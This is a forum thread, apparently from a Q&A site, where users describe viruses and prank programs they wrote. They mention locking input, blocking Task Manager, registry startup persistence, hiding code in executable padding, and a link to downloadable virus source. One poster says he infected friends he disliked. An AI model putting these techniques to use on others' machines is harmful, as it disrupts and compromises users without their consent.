I once wrote a "virus" that blocked user input, self-replicated, set itself at startup and ran multiple dir /s > c:\log_[number].txt

It was fairly inoffensive but I had fun giving it to friends I didn't like much.


47
[0] [2011-02-18 18:08:42] Corey Ogburn

Because of totally unrelated activities in my background check, I have avoided writing destructive viruses for the sake of destruction. I've written a few but they're partially untested. I tested aspects such as preventing the task manager from displaying, preventing a user from closing the window or stopping the process, making the app run even in safe mode (just replace explorer.exe, but you didn't hear it from me).

Instead, I wrote some prank applications. I have one that places a 1% transparent window over the entire screen. It has such a low level of transparency that it doesn't even slightly fade the screen, it's completely invisible but intercepts all clicks because it's technically there. Alt+F4 won't close it, Alt+Space won't give you drop down so you can't close that way, it opens a stream to the Task Manager so that Ctrl+Alt+Del or Ctrl+Shift+Esc won't be able to open the task manager. You could hit the windows key to open the start menu, but any other key input is captured by the window. Plus it put itself into the registry so that it'll run on user and machine start up. I've tested it with having a few ways to allow myself to close it, but should I ever deploy this (as a friendly prank) all those mechanisms would be removed.


48
[0] [2011-02-18 18:23:02] biziclop

I wrote one or two in the good old DOS days, although I never released them into the wild. I was more interested in stealth techniques than anything else really, and I got fairly decent results. It was a very useful exercise, I have to say, but I find modern viruses quite boring. Mostly because I'm not interested in how Windows works internally, I guess.

One thing I remember I did was that I figured out that a lot of the .exe files contained a few hundred bytes of zeroes (due to either lazy coding or linking), which was ideal for me, as I could hide my code in there and zero the area out once my virus code had run. I was quite proud of myself, as you could imagine a 15 year old would.

Another thing I remember now is that the "harmful effect" of one of my viruses was to display a subliminal message for a split second on the screen. The message was "You need a wee."


49
[0] [2011-07-13 14:35:42] fady mohamed osman

Yes i did and it's open source you can check it out here: an overview of the virus design:

http://www.dark-masters.tk/site/index.php/articles/3-the-open-source-virus-design-overview

a full code documentation:

http://www.dark-masters.tk/OSV_doc

and code download here:

http://www.dark-masters.tk/site/index.php/tools/4-the-open-source-virus


50
[-2] [2009-04-26 05:00:24] Eric

I focused mostly on windows viruses. There is a very elite group called 29a which do a lot of research about stealth execution on windows.

Besides there is rootkit.com which focus on stealth in windows drivers. I think that reseaching viruses requires a great in-depth knowledge of how the OS works so it is not such a trivial effort of destruction. I've never actually did any harm with viruses but i researched that a lot for knowledge.

Anything about hacking requires great understanding about how things work so state of the art hacking is also state of the art computing.

Just remember uncle Ben : With great powers come great responsibilities!


51